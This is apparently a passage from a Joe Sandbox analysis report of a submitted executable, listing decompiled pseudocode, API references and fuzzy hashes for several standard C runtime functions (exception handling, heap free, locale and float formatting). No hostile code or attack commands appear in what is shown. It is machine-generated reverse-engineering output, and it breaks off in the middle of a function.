                      • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                      • String ID:
                      • API String ID: 1602911419-0
                      • Opcode ID: 4b2ab6df44a4890b6c780c4c42d9139b8766dfd5e5185ba154c89391fd6b34d0
                      • Instruction ID: 0daa8b67c47c473bc710cfcf4bfcec87d77ca9b3cc66d9d98589ed68b50df625
                      • Opcode Fuzzy Hash: 4b2ab6df44a4890b6c780c4c42d9139b8766dfd5e5185ba154c89391fd6b34d0
                      • Instruction Fuzzy Hash: A311C9B1C00209DFDB00EFA5D945AEEBBB0FF04314F10806EF854A7291DB389A519B98
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 26%
                      			E004163D5(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                      				void* __ebp;
                      				void* _t20;
                      				void* _t22;
                      				void* _t23;
                      				void* _t25;
                      				intOrPtr* _t26;
                      				void* _t27;
                      				void* _t28;
                      
                      				_t27 = __esi;
                      				_t26 = __edi;
                      				_t23 = __ecx;
                      				_t22 = __ebx;
                      				_t30 = _a20;
                      				if(_a20 != 0) {
                      					_push(_a20);
                      					_push(__ebx);
                      					_push(__esi);
                      					_push(_a4);
                      					E00416343(__ebx, __edi, __esi, _t30);
                      					_t28 = _t28 + 0x10;
                      				}
                      				_t31 = _a28;
                      				_push(_a4);
                      				if(_a28 != 0) {
                      					_push(_a28);
                      				} else {
                      					_push(_t27);
                      				}
                      				E0041591B(_t23);
                      				_push( *_t26);
                      				_push(_a16);
                      				_push(_a12);
                      				_push(_t27);
                      				E00415DC0(_t22, _t25, _t26, _t27, _t31);
                      				_push(0x100);
                      				_push(_a24);
                      				_push(_a16);
                      				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
                      				_push(_a8);
                      				_push(_t27);
                      				_push(_a4);
                      				_t20 = E00416028(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t26, _t27, _t31);
                      				if(_t20 != 0) {
                      					E004158D4(_t20, _t27);
                      					return _t20;
                      				}
                      				return _t20;
                      			}











                      0x004163d5
                      0x004163d5
                      0x004163d5
                      0x004163d5
                      0x004163da
                      0x004163de
                      0x004163e0
                      0x004163e3
                      0x004163e4
                      0x004163e5
                      0x004163e8
                      0x004163ed
                      0x004163ed
                      0x004163f0
                      0x004163f4
                      0x004163f7
                      0x004163fc
                      0x004163f9
                      0x004163f9
                      0x004163f9
                      0x004163ff
                      0x00416404
                      0x00416406
                      0x00416409
                      0x0041640c
                      0x0041640d
                      0x00416415
                      0x0041641a
                      0x0041641e
                      0x00416421
                      0x00416424
                      0x0041642a
                      0x0041642b
                      0x0041642e
                      0x00416438
                      0x0041643c
                      0x00000000
                      0x0041643c
                      0x00416442

                      APIs
                      • ___BuildCatchObject.LIBCMT ref: 004163E8
                        • Part of subcall function 00416343: ___BuildCatchObjectHelper.LIBCMT ref: 00416379
                      • _UnwindNestedFrames.LIBCMT ref: 004163FF
                      • ___FrameUnwindToState.LIBCMT ref: 0041640D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.304961274.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.304953062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305007743.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305016112.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305025625.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305042313.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305046967.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                      • String ID: TsA$csm
                      • API String ID: 2163707966-3388165190
                      • Opcode ID: 5ee04d9c283753622e4348d8cfe0cecd4f2f6ec43423cb856e4ca81c0f2d08e3
                      • Instruction ID: d69c25e17cad3efa29224d1e44031e3b4bab8f93dc90641abc2906f6c70405cc
                      • Opcode Fuzzy Hash: 5ee04d9c283753622e4348d8cfe0cecd4f2f6ec43423cb856e4ca81c0f2d08e3
                      • Instruction Fuzzy Hash: 1901467100010AFBDF126F52CC45EEB7F6AEF08354F01802ABC1815121DB3AD9B1DBAA
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 74%
                      			E00415D77(void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                      				signed int _v8;
                      				void* __ebp;
                      				intOrPtr* _t15;
                      				intOrPtr* _t18;
                      				void* _t22;
                      
                      				_t25 = __esi;
                      				_t24 = __edi;
                      				_t23 = __edx;
                      				_t30 =  *((intOrPtr*)( *_a4)) - 0xe0434f4d;
                      				if( *((intOrPtr*)( *_a4)) == 0xe0434f4d) {
                      					__eflags =  *((intOrPtr*)(E0040BD70(_t22, __edx, __eflags) + 0x90));
                      					if(__eflags > 0) {
                      						_t15 = E0040BD70(_t22, __edx, __eflags) + 0x90;
                      						 *_t15 =  *_t15 - 1;
                      						__eflags =  *_t15;
                      					}
                      					goto L9;
                      				} else {
                      					__eflags = __eax - 0xe06d7363;
                      					if(__eflags != 0) {
                      						L9:
                      						__eflags = 0;
                      						return 0;
                      					} else {
                      						 *(E0040BD70(__ebx, __edx, __eflags) + 0x90) =  *(__eax + 0x90) & 0x00000000;
                      						_push(8);
                      						_push(0x416fc0);
                      						E00408168(_t22, __edi, __esi);
                      						_t18 =  *((intOrPtr*)(E0040BD70(_t22, __edx, _t30) + 0x78));
                      						if(_t18 != 0) {
                      							_v8 = _v8 & 0x00000000;
                      							 *_t18();
                      							_v8 = 0xfffffffe;
                      						}
                      						return E004081AD(E00411135(_t22, _t23, _t24, _t25));
                      					}
                      				}
                      			}








                      0x00415d77
                      0x00415d77
                      0x00415d77
                      0x00415d83
                      0x00415d88
                      0x00415da7
                      0x00415dae
                      0x00415db5
                      0x00415dba
                      0x00415dba
                      0x00415dba
                      0x00000000
                      0x00415d8a
                      0x00415d8a
                      0x00415d8f
                      0x00415dbc
                      0x00415dbc
                      0x00415dbf
                      0x00415d91
                      0x00415d96
                      0x0040c34d
                      0x0040c34f
                      0x0040c354
                      0x0040c35e
                      0x0040c363
                      0x0040c365
                      0x0040c369
                      0x0040c374
                      0x0040c374
                      0x0040c385
                      0x0040c385
                      0x00415d8f

                      APIs
                      • __getptd.LIBCMT ref: 00415D91
                        • Part of subcall function 0040BD70: __getptd_noexit.LIBCMT ref: 0040BD73
                        • Part of subcall function 0040BD70: __amsg_exit.LIBCMT ref: 0040BD80
                      • __getptd.LIBCMT ref: 00415DA2
                      • __getptd.LIBCMT ref: 00415DB0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.304961274.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.304953062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305007743.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305016112.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305025625.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305042313.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305046967.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: __getptd$__amsg_exit__getptd_noexit
                      • String ID: MOC$csm
                      • API String ID: 803148776-1389381023
                      • Opcode ID: b7ff1ba13705d0e234ad541d03230bbea4906e090ae1f9df2853cd415b5ef04c
                      • Instruction ID: 7476e578de222c3f650eae696de84e137a600846ab43f73c4baadf4b58ee893f
                      • Opcode Fuzzy Hash: b7ff1ba13705d0e234ad541d03230bbea4906e090ae1f9df2853cd415b5ef04c
                      • Instruction Fuzzy Hash: 65E01A35110608CFC710AB69D04ABE977A5FF85318F1541A6E80CC73A3D73CE880968E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 89%
                      			E0040E92F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                      				signed int _t15;
                      				LONG* _t21;
                      				long _t23;
                      				void* _t31;
                      				LONG* _t33;
                      				void* _t34;
                      				void* _t35;
                      
                      				_t35 = __eflags;
                      				_t29 = __edx;
                      				_t25 = __ebx;
                      				_push(0xc);
                      				_push(0x417108);
                      				E00408168(__ebx, __edi, __esi);
                      				_t31 = E0040BD70(__ebx, __edx, _t35);
                      				_t15 =  *0x418d34; // 0xfffffffe
                      				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                      					E00407670(_t25, _t29, _t31, 0xd);
                      					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                      					_t33 =  *(_t31 + 0x68);
                      					 *(_t34 - 0x1c) = _t33;
                      					__eflags = _t33 -  *0x418c38; // 0x481860
                      					if(__eflags != 0) {
                      						__eflags = _t33;
                      						if(_t33 != 0) {
                      							_t23 = InterlockedDecrement(_t33);
                      							__eflags = _t23;
                      							if(_t23 == 0) {
                      								__eflags = _t33 - 0x418810;
                      								if(_t33 != 0x418810) {
                      									_push(_t33);
                      									E0040617D();
                      								}
                      							}
                      						}
                      						_t21 =  *0x418c38; // 0x481860
                      						 *(_t31 + 0x68) = _t21;
                      						_t33 =  *0x418c38; // 0x481860
                      						 *(_t34 - 0x1c) = _t33;
                      						InterlockedIncrement(_t33);
                      					}
                      					 *(_t34 - 4) = 0xfffffffe;
                      					E0040E9CA();
                      				} else {
                      					_t33 =  *(_t31 + 0x68);
                      				}
                      				if(_t33 == 0) {
                      					E00406BE8(0x20);
                      				}
                      				return E004081AD(_t33);
                      			}










                      0x0040e92f
                      0x0040e92f
                      0x0040e92f
                      0x0040e92f
                      0x0040e931
                      0x0040e936
                      0x0040e940
                      0x0040e942
                      0x0040e94a
                      0x0040e96b
                      0x0040e971
                      0x0040e975
                      0x0040e978
                      0x0040e97b
                      0x0040e981
                      0x0040e983
                      0x0040e985
                      0x0040e988
                      0x0040e98e
                      0x0040e990
                      0x0040e992
                      0x0040e998
                      0x0040e99a
                      0x0040e99b
                      0x0040e9a0
                      0x0040e998
                      0x0040e990
                      0x0040e9a1
                      0x0040e9a6
                      0x0040e9a9
                      0x0040e9af
                      0x0040e9b3
                      0x0040e9b3
                      0x0040e9b9
                      0x0040e9c0
                      0x0040e952
                      0x0040e952
                      0x0040e952
                      0x0040e957
                      0x0040e95b
                      0x0040e960
                      0x0040e968

                      APIs
                      • __getptd.LIBCMT ref: 0040E93B
                        • Part of subcall function 0040BD70: __getptd_noexit.LIBCMT ref: 0040BD73
                        • Part of subcall function 0040BD70: __amsg_exit.LIBCMT ref: 0040BD80
                      • __amsg_exit.LIBCMT ref: 0040E95B
                      • __lock.LIBCMT ref: 0040E96B
                      • InterlockedDecrement.KERNEL32(?), ref: 0040E988
                      • InterlockedIncrement.KERNEL32(00481860), ref: 0040E9B3
                      Memory Dump Source
                      • Source File: 00000000.00000002.304961274.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.304953062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305007743.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305016112.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305025625.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305042313.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305046967.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                      • String ID:
                      • API String ID: 4271482742-0
                      • Opcode ID: 516cf4ae0b6e82707ae2d5a8868951b720f2ae201203581f27c7b5bbac0e48e2
                      • Instruction ID: ab0f9b78bd71dce74febf2d25f83fab80e53a4f08a0c435d7ef074ac4792bfe4
                      • Opcode Fuzzy Hash: 516cf4ae0b6e82707ae2d5a8868951b720f2ae201203581f27c7b5bbac0e48e2
                      • Instruction Fuzzy Hash: 1B01C8B1906625DBC761AB2B9945B9A7360AF04754F04443FE800772D1CF3C6C61CBDD
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 41%
                      			E0040617D() {
                      				intOrPtr* _t10;
                      				intOrPtr _t13;
                      				void* _t15;
                      				void* _t21;
                      				void* _t22;
                      				void* _t23;
                      				intOrPtr _t24;
                      				void* _t26;
                      
                      				_push(0xc);
                      				_push(0x416d00);
                      				_t8 = E00408168(_t15, _t22, _t23);
                      				_t24 =  *((intOrPtr*)(_t26 + 8));
                      				if(_t24 == 0) {
                      					L9:
                      					return E004081AD(_t8);
                      				}
                      				if( *0x4461dc != 3) {
                      					_push(_t24);
                      					L7:
                      					if(HeapFree( *0x443248, 0, ??) == 0) {
                      						_t10 = E0040747B();
                      						 *_t10 = E00407439(GetLastError());
                      					}
                      					goto L9;
                      				}
                      				E00407670(_t15, _t21, _t22, 4);
                      				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
                      				_t13 = E004076A3(_t24);
                      				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
                      				if(_t13 != 0) {
                      					_push(_t24);
                      					_push(_t13);
                      					E004076D3();
                      				}
                      				 *(_t26 - 4) = 0xfffffffe;
                      				_t8 = E004061D3();
                      				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
                      					goto L9;
                      				} else {
                      					_push( *((intOrPtr*)(_t26 + 8)));
                      					goto L7;
                      				}
                      			}











                      0x0040617d
                      0x0040617f
                      0x00406184
                      0x00406189
                      0x0040618e
                      0x00406205
                      0x0040620a
                      0x0040620a
                      0x00406197
                      0x004061dc
                      0x004061dd
                      0x004061ed
                      0x004061ef
                      0x00406202
                      0x00406204
                      0x00000000
                      0x004061ed
                      0x0040619b
                      0x004061a1
                      0x004061a6
                      0x004061ac
                      0x004061b1
                      0x004061b3
                      0x004061b4
                      0x004061b5
                      0x004061bb
                      0x004061bc
                      0x004061c3
                      0x004061cc
                      0x00000000
                      0x004061ce
                      0x004061ce
                      0x00000000
                      0x004061ce

                      APIs
                      • __lock.LIBCMT ref: 0040619B
                        • Part of subcall function 00407670: __mtinitlocknum.LIBCMT ref: 00407686
                        • Part of subcall function 00407670: __amsg_exit.LIBCMT ref: 00407692
                        • Part of subcall function 00407670: EnterCriticalSection.KERNEL32(?,?,?,004113F5,00000004,004171A8,0000000C,0040D6D2,00000001,?,00000000,00000000,00000000,?,0040BD22,00000001), ref: 0040769A
                      • ___sbh_find_block.LIBCMT ref: 004061A6
                      • ___sbh_free_block.LIBCMT ref: 004061B5
                      • HeapFree.KERNEL32(00000000,00000001,00416D00,0000000C,00407651,00000000,00416E70,0000000C,0040768B,00000001,?,?,004113F5,00000004,004171A8,0000000C), ref: 004061E5
                      • GetLastError.KERNEL32(?,004113F5,00000004,004171A8,0000000C,0040D6D2,00000001,?,00000000,00000000,00000000,?,0040BD22,00000001,00000214), ref: 004061F6
                      Memory Dump Source
                      • Source File: 00000000.00000002.304961274.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.304953062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305007743.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305016112.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305025625.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305042313.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305046967.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                      • String ID:
                      • API String ID: 2714421763-0
                      • Opcode ID: f4dc4582baf0c4bd323ae12e176d1ceb5aca47974afd5602237febc983ca7a33
                      • Instruction ID: 7cdafc72865620b7821f5172698210920c74f43659bef47e4ba226adb4d8dd8f
                      • Opcode Fuzzy Hash: f4dc4582baf0c4bd323ae12e176d1ceb5aca47974afd5602237febc983ca7a33
                      • Instruction Fuzzy Hash: 0901A771C04211AADB207F72AC06B5F3A649F02764F11443FF4527A1D2DA3D9991CB9E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 65%
                      			E00410C88() {
                      				signed long long _v12;
                      				signed int _v20;
                      				signed long long _v28;
                      				signed char _t8;
                      
                      				_t8 = GetModuleHandleA("KERNEL32");
                      				if(_t8 == 0) {
                      					L6:
                      					_v20 =  *0x403638;
                      					_v28 =  *0x403630;
                      					asm("fsubr qword [ebp-0x18]");
                      					_v12 = _v28 / _v20 * _v20;
                      					asm("fld1");
                      					asm("fcomp qword [ebp-0x8]");
                      					asm("fnstsw ax");
                      					if((_t8 & 0x00000005) != 0) {
                      						return 0;
                      					} else {
                      						return 1;
                      					}
                      				} else {
                      					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                      					if(__eax == 0) {
                      						goto L6;
                      					} else {
                      						_push(0);
                      						return __eax;
                      					}
                      				}
                      			}







                      0x00410c8d
                      0x00410c95
                      0x00410cac
                      0x00410c58
                      0x00410c61
                      0x00410c6d
                      0x00410c70
                      0x00410c73
                      0x00410c75
                      0x00410c78
                      0x00410c7d
                      0x00410c87
                      0x00410c7f
                      0x00410c83
                      0x00410c83
                      0x00410c97
                      0x00410c9d
                      0x00410ca5
                      0x00000000
                      0x00410ca7
                      0x00410ca7
                      0x00410cab
                      0x00410cab
                      0x00410ca5

                      APIs
                      • GetModuleHandleA.KERNEL32(KERNEL32,0040AE7A), ref: 00410C8D
                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00410C9D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.304961274.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.304953062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305007743.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305016112.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305025625.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305042313.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305046967.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: AddressHandleModuleProc
                      • String ID: IsProcessorFeaturePresent$KERNEL32
                      • API String ID: 1646373207-3105848591
                      • Opcode ID: 849291338ce3d63dde9b087aa9bd3a28552f9dc7da4fe46b9535fd13aa592c58
                      • Instruction ID: 2cc87d07ba03b1b782b82d160500d17f1eff63234b3d3f6bb45c75640bbf4e22
                      • Opcode Fuzzy Hash: 849291338ce3d63dde9b087aa9bd3a28552f9dc7da4fe46b9535fd13aa592c58
                      • Instruction Fuzzy Hash: 2FF03030A00A09E2DF142FA1AE0A6AF7E7CBB80702F9105A1D1D6B01D4EF7581F5C69A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0040DEDE(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                      				intOrPtr _v8;
                      				signed int _v12;
                      				char _v20;
                      				signed int _t54;
                      				intOrPtr _t56;
                      				int _t57;
                      				int _t58;
                      				signed short* _t59;
                      				short* _t60;
                      				int _t65;
                      				char* _t73;
                      
                      				_t73 = _a8;
                      				if(_t73 == 0 || _a12 == 0) {
                      					L5:
                      					return 0;
                      				} else {
                      					if( *_t73 != 0) {
                      						E0040904E( &_v20, __edi, _a16);
                      						if( *((intOrPtr*)(_v20 + 0x14)) != 0) {
                      							if(E0040E00F( *_t73 & 0x000000ff,  &_v20) == 0) {
                      								if(MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
                      									L10:
                      									if(_v8 != 0) {
                      										 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                      									}
                      									return 1;
                      								}
                      								L21:
                      								_t54 = E0040747B();
                      								 *_t54 = 0x2a;
                      								if(_v8 != 0) {
                      									_t54 = _v12;
                      									 *(_t54 + 0x70) =  *(_t54 + 0x70) & 0xfffffffd;
                      								}
                      								return _t54 | 0xffffffff;
                      							}
                      							_t56 = _v20;
                      							_t65 =  *(_t56 + 0xac);
                      							if(_t65 <= 1 || _a12 < _t65) {
                      								L17:
                      								if(_a12 <  *(_t56 + 0xac) || _t73[1] == 0) {
                      									goto L21;
                      								} else {
                      									goto L19;
                      								}
                      							} else {
                      								_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                      								_t56 = _v20;
                      								if(_t58 != 0) {
                      									L19:
                      									_t57 =  *(_t56 + 0xac);
                      									if(_v8 == 0) {
                      										return _t57;
                      									}
                      									 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                      									return _t57;
                      								}
                      								goto L17;
                      							}
                      						}
                      						_t59 = _a4;
                      						if(_t59 != 0) {
                      							 *_t59 =  *_t73 & 0x000000ff;
                      						}
                      						goto L10;
                      					} else {
                      						_t60 = _a4;
                      						if(_t60 != 0) {
                      							 *_t60 = 0;
                      						}
                      						goto L5;
                      					}
                      				}
                      			}














                      0x0040dee8
                      0x0040deef
                      0x0040df06
                      0x00000000
                      0x0040def6
                      0x0040def8
                      0x0040df12
                      0x0040df1d
                      0x0040df4f
                      0x0040dfed
                      0x0040df2d
                      0x0040df30
                      0x0040df35
                      0x0040df35
                      0x00000000
                      0x0040df3b
                      0x0040dfaf
                      0x0040dfaf
                      0x0040dfb4
                      0x0040dfbd
                      0x0040dfbf
                      0x0040dfc2
                      0x0040dfc2
                      0x00000000
                      0x0040dfc6
                      0x0040df51
                      0x0040df54
                      0x0040df5d
                      0x0040df84
                      0x0040df8d
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040df64
                      0x0040df77
                      0x0040df7f
                      0x0040df82
                      0x0040df94
                      0x0040df94
                      0x0040df9d
                      0x0040df0b
                      0x0040df0b
                      0x0040dfa6
                      0x00000000
                      0x0040dfa6
                      0x00000000
                      0x0040df82
                      0x0040df5d
                      0x0040df1f
                      0x0040df24
                      0x0040df2a
                      0x0040df2a
                      0x00000000
                      0x0040defa
                      0x0040defa
                      0x0040deff
                      0x0040df03
                      0x0040df03
                      0x00000000
                      0x0040deff
                      0x0040def8

                      APIs
                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040DF12
                      • __isleadbyte_l.LIBCMT ref: 0040DF46
                      • MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,?,?,6E49C677,00000000,00000000,?), ref: 0040DF77
                      • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000001,00000000,00000000,?,?,?,6E49C677,00000000,00000000,?), ref: 0040DFE5
                      Memory Dump Source
                      • Source File: 00000000.00000002.304961274.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.304953062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305007743.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305016112.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305025625.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305042313.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305046967.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                      • String ID:
                      • API String ID: 3058430110-0
                      • Opcode ID: efa1c4807faf2de5249cdde7e0ad398816fe84a95a35b08c13bc6bbfd9111492
                      • Instruction ID: 3364307831111e090e90a540cb8b838cdfe72a3ac2f9eac63f3894a4aac76be5
                      • Opcode Fuzzy Hash: efa1c4807faf2de5249cdde7e0ad398816fe84a95a35b08c13bc6bbfd9111492
                      • Instruction Fuzzy Hash: 0D31CE31E00247EFCB20EFA4C884AAA3BA1AF01310F14857AF562AB2D1D334DD54DB59
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00410B74(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                      				intOrPtr _t25;
                      				void* _t26;
                      				void* _t28;
                      
                      				_t25 = _a16;
                      				if(_t25 == 0x65 || _t25 == 0x45) {
                      					_t26 = E00410465(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                      					goto L9;
                      				} else {
                      					_t34 = _t25 - 0x66;
                      					if(_t25 != 0x66) {
                      						__eflags = _t25 - 0x61;
                      						if(_t25 == 0x61) {
                      							L7:
                      							_t26 = E00410555(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                      						} else {
                      							__eflags = _t25 - 0x41;
                      							if(__eflags == 0) {
                      								goto L7;
                      							} else {
                      								_t26 = E00410A7A(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                      							}
                      						}
                      						L9:
                      						return _t26;
                      					} else {
                      						return E004109BF(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                      					}
                      				}
                      			}






                      0x00410b79
                      0x00410b7f
                      0x00410bf2
                      0x00000000
                      0x00410b86
                      0x00410b86
                      0x00410b89
                      0x00410ba4
                      0x00410ba7
                      0x00410bc7
                      0x00410bd9
                      0x00410ba9
                      0x00410ba9
                      0x00410bac
                      0x00000000
                      0x00410bae
                      0x00410bc0
                      0x00410bc0
                      0x00410bac
                      0x00410bf7
                      0x00410bfb
                      0x00410b8b
                      0x00410ba3
                      0x00410ba3
                      0x00410b89

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.304961274.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.304953062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305007743.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305016112.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305025625.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305042313.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305046967.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                      • String ID:
                      • API String ID: 3016257755-0
                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                      • Instruction ID: a00fe7094c665b1aa83b003f8bcb39f1fd7a9ba829c258cca2bc7f148fee25eb
                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                      • Instruction Fuzzy Hash: 3A117E3204414AFBCF125ED4CC51CEE3F22BB18358F588416FA5859131C77AD9F1AB89
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 90%
                      			E0040F09B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                      				signed int _t13;
                      				intOrPtr _t27;
                      				intOrPtr _t29;
                      				void* _t30;
                      				void* _t31;
                      
                      				_t31 = __eflags;
                      				_t26 = __edi;
                      				_t25 = __edx;
                      				_t22 = __ebx;
                      				_push(0xc);
                      				_push(0x417148);
                      				E00408168(__ebx, __edi, __esi);
                      				_t29 = E0040BD70(__ebx, __edx, _t31);
                      				_t13 =  *0x418d34; // 0xfffffffe
                      				if(( *(_t29 + 0x70) & _t13) == 0) {
                      					L6:
                      					E00407670(_t22, _t25, _t26, 0xc);
                      					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                      					_t8 = _t29 + 0x6c; // 0x6c
